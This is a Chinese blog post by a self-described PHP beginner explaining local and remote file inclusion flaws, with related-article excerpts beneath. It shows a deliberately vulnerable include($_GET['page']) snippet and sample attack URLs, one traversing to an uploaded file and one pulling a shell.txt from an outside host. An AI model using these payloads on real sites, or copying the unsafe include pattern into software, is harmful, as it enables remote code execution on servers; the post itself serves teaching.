远程包含漏洞和本地包含漏洞

最新推荐文章于 2023-01-27 19:37:14 发布
最新推荐文章于 2023-01-27 19:37:14 发布
阅读量2.3k 收藏
点赞数
文章标签: include 联想 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/retty85/article/details/2067913
版权
  用自己的话解释下吧,包含漏洞应该只是出在〔include(),require()和include_once(),require_once()〕

这三个函数上的,每个函数的意思好象是说当判断当前文件或者执行当前函数的时候出错或者什么原因时,

就执行下面语句,

[因为程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,

于是就把需要公用的代码写在一个单独的文件里面,比如 share.php,而后在其它文件进行包含调用]

当下面语句恰好是程序远用以上3个函数调用某个文件的时候,这样恰恰就造成了远程包含漏洞!

       其实吧  看过文章后,联想了下本地包含,感觉其实本地包含和远程包含其实可以说成是一样的!

因为我想本地包含漏洞得具备俩条件,第一: 该套程序得有某个文件具备了包含漏洞(包含漏洞也可以查看

本目录或者网站目录的所有文件的,只要知道路径,就可以一级一级跳)。那么既然可以看本地的文件,如果

这个程序有上传,而你又上传了一个任意文件呢?举个例子:

比如 一个论坛目录下的/test/ershao.php文件存在
程序代码 程序代码
if ($_GET[page]) {
include $_GET[page];
} else {
include "home.php";
}
包含漏洞。然后我们去注册一个ID,然后发贴的时候传上一个附件

路径如: http://www.xxx.com/bbs/uploa/img/8888888.txt  OK ,然后用包含漏洞来调用这个文件,

格式: http://www.xxx.com/bbs/test/ershao.php?page=../uploa/img/8888888.txt?

那么这样就构造出来了本地包含漏洞,如果不具备上传或没办法把自己想要上传的文件传上,

那就用远程包含,格式:

http://www.xxx.com/bbs/test/ershao.php?page=http://www.zhuangbi.cn/shell.txt?

这样就OK了!

推荐看下《包含文件漏洞详解》: http://www.zhuangbi.cn/article.asp?id=175

                                     因为第一次接触php ,什么都不懂,今天就用自己的话来描述下自己所理解

的意思,如果那点我说错了,或者理解错误,一定要提醒我,免的我错下去! 
retty85
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
1.文件包含漏洞
qq_51478862的博客
11-19 710
一,什么是文件包含漏洞 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 例如: <php require $_GET['filename'];?php> 总结:要想成功利用文件包含漏洞,需要满足两个条件 1,要有文件包含函数并且通过动态变量的方式引入需要包含的文件 2,用户能够控制该动态变量 php中常
【web安全】——文件包含漏洞
热门推荐
Demo不是emo的博客
12-02 2万+
文件包含漏洞详解,持续更新中
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1246
Web安全领域的探索之远程文件包含漏洞(LFI)
菜鸟玩远程包含漏洞--实战篇
weixin_33815613的博客
09-07 193
在本文你可以学到: 1、 怎样利用已知漏洞 2、 远程包含漏洞入侵整个过程 一、 菜鸟的感慨: 唉!为什么我们就是不能自己找到别人没有找到的漏洞呢?别人找到漏洞了,写文章就写一大片的理论知识,让我们望而生畏 ,高深啊,岂是我们一般菜鸟所能理解! 一大群菜鸟垂头丧气的从看似高深而时间简单的漏洞前走过,我们不禁呼喊:“高手啊!你就发发慈悲,给我们机...
文件包含漏洞详解
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2014
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
安全漏洞分类
blade2001的专栏
05-16 3692
漏洞是在硬件、软件、协议的具体实现或系统安全策略上(主要是人为)存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。 分类 1. 从数据角度看分为 ●能读按理不能读的数据,包括内存中的数据、文件中的数据、用户输入的数据、数据库中的数据、网络上传输的数据等等。  ●能把指定的内容写入指定的地方(这个地方包括文件、内存、数据库等)  ●输入的数据能被执行(
文件上传漏洞之——远程文件包含漏洞(RFI)
wsnbbz的博客
03-04 4448
定义 如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令 原理 同本地文件包含原理,只是参数可以换成一个远程的url地址,此时包含的文件不能为php文件,可写成txt或者图片马等等 文件包含的时候,无视文件格式,只要文件中有php代码,就会被执行 复现 dvwa lo...
远程文件包含原理及利用
G3et的博客
01-27 684
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
远程文件包含漏洞
Ethan024的博客
04-08 727
什么是远程文件包含漏洞: 攻击者可以通过访问外部地址来加载远程代码。 实验环境: 皮卡丘靶场—File Inclusion(remote) (tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开 allow_url_include = on //默认关闭) 实验步骤: 正常提交请求: 此时的url提交的内容为当前目标文件路径: http://localhost/pikaqiu.cn/vul/fileinclude/f
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使...
exploits:该存储库包含公共漏洞利用列表
05-11
漏洞利用该存储库包含公共漏洞利用列表。 可能会对原始漏洞利用程序进行了一些修改,但应将信誉归功于原始作者。 该存储库的目的是合并工作漏洞利用列表并即时使用它们。 以下是漏洞利用程序及其破坏的清单openfuck....
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
WebCruiser Web 漏洞扫描器V3.3.0
02-17
能够扫描SQL注入(SQL注入), Cross Site Scripting(跨站), Local File Inclusion(本地文件包含), Remote File Inclusion(远程文件包含), Redirect(重定向) 等等,并且支持漏洞的POC(Proof of Concept, ...
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2420
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
本第包含远程包含--学习篇
weixin_46865273的博客
05-19 644
1、什么是文件包含 用一句话来说就是,文件包含不下雨漏洞,当时由于对包含进行的文件不可控,导致了文件包含漏洞的产生 文件包含分为两种 1、本地文件包含LFI (包含本地文件操控LFI) 2、远程文件包含RFI (需要添加默认php是不开启远程文件包含 开启需要配置allow_url_include = On 通过SMB也可以绕过 文件包含的函数 include(‘1.txt’) 加载某个文件内容当作php代码进行执行,它不在意后缀任何文件都可以包含,包括图片码 php运行到inclu
本地文件包含远程文件包含漏洞
weixin_41554088的博客
05-04 1751
总结一下 1.文件包含漏洞分两种:LFI(local file include)本地文件包含 和 RFI(remote file include远程文件包含 2.文件包含常用到的函数:include() 和 require() 3.特性:文件包含读取文件内容后,会将其当做php执行,所以在文件包含时,后缀是什么已经不重要了 4.RFI需要满足满足三个条件:1.需要allow_url_include=On(默认为off) 2.你的木马不存在目标主机上 3.要包含远程地址一般都是txt 这里拿ph
本地文件包含&远程文件包含漏洞复现
weixin_45701675的博客
11-20 1236
本地文件包含远程文件包含
请详细介绍文件包含漏洞
最新发布
04-22
一般分为本地文件包含漏洞远程文件包含漏洞。本地文件包含漏洞是指攻击者可以在本地文件系统中读取、执行或者删除文件,而远程文件包含漏洞则是指攻击者可以远程读取服务器上的文件。 在代码中,如果应用程序使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值